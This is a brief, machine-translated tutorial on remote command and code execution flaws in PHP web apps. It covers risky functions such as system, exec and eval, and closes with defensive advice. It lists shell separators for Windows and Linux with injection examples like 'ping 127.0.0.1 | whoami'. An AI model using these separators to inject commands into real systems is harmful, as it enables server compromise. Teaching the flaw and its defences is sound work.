RCE brief introduction

        RCE（remote command/code execute）： Remote command / Code execution .

         Command Execution Vulnerability ： Call operating system commands directly .

         Code Execution Vulnerability ： Call operating system commands by executing script code .

         reason ： stay Web In application, sometimes programmers consider flexibility 、 Conciseness , It will call the code or command execution function in the code to deal with . For example, when an application is invoking something that can character string When converting functions into code , It doesn't consider whether the user can control this string , Will cause Code Execution Vulnerability . Also call the system command processing , Will create a command execution vulnerability .

principle

        The attacker is in a position where he can execute system commands , Enter malicious system commands , The server does not strictly filter the execution functions , Cause the server to execute the malicious system command , Thus, it poses a security threat to the server .

        The difference between command execution and code execution ： Command execution vulnerability is the direct invocation of operating system commands , The Code Execution Vulnerability relies on executing script code to call operating system commands .

Command execution

         System commands execute functions

        System（）：system Function can be used to execute an external application and output the corresponding execution result , The function prototype is as follows ： system(command,return_var) among ,command It's an order to execute ,return_var Store the status value of the executed command .

        Exec（）：exec Functions can be used to execute an external application exec (command, output, return_var) among ,command It's an order to execute ,output Is to get the execution command output of each line of string ,return_var Store the status value after executing the command .

        Passthru（）：passthru Function can be used to execute a UNIX The system commands and displays the original output , When UNIX The output of the system command is binary data , And need to return the value directly to the browser , Need to use passthru Function to replace system And exec function .Passthru The function prototype is as follows ：passthru (command, return_var)

among ,command It's an order to execute ,return_var Store the status value after executing the command .
        Shell_exec（）： perform shell Command and return the output string , The function prototype is as follows ： shell_exec (command) among ,command It's an order to execute .

        popen()         proc_open()         pcntl_exec()

         Pipe,

 Window series
        " | ": Execute the following statements directly . for example ：ping 127.0.0.1 | whoami.
        “ || ”： If the previously executed statement fails to execute , Then execute the following statement , The preceding statement can only be false . for example ：ping 127.0.0.1 || whoami
        " & " : If the previous statement is false, execute the following statement directly , The preceding sentence is true or false . for example ： ping 127.0.0.1 &whoami.
        “ && ”： If the previous statement is false, an error will occur , Do not execute the following statements , The previous statement can only be true . for example ：ping 127.0.0.1 && whoami.

        

Linux System
        “;” After executing the previous statement, execute the following . for example : ping 127.0.0.1;whoami
        “ | ”： Display the execution results of the following statements . for example : ping 127.0.0.1 | whoami.
        “ || ”： When the previous statement fails to execute , Execute the following statement . for example ： ping 1|| whoami.
        “ & ”： If the previous statement is false, the following statement will be executed directly . The preceding sentence is true or false . for example ：ping 127.0.0.1 & whoami.
        “ && ”： If the previous statement is false, an error will occur , And don't do the following , The previous statement can only be true . for example ： ping 127.0.0.1 && whoami.

Code execution

        Script code execution function

         eval()： Follow the string as PHP Code to execute . If it is not invoked in the code string return sentence , Then return to NULL. If there are parsing errors in the code , be eval() The function returns false.

        assert()： Normal call

        preg_replace()  ： Regularize a string

        call_user_func()        array_map()

defense

         Try to use quotation marks for parameter values

         Use as few functions as possible to execute commands or disable them directly

         Before using dynamic functions , Make sure that the function used is one of the specified functions

         Entering the function to execute the command / Before method , Filter the parameters , Escape sensitive characters

         Work that can be solved with scripts , Don't call other programs to handle . Use as few functions as possible to execute commands , And in disable_functions disable .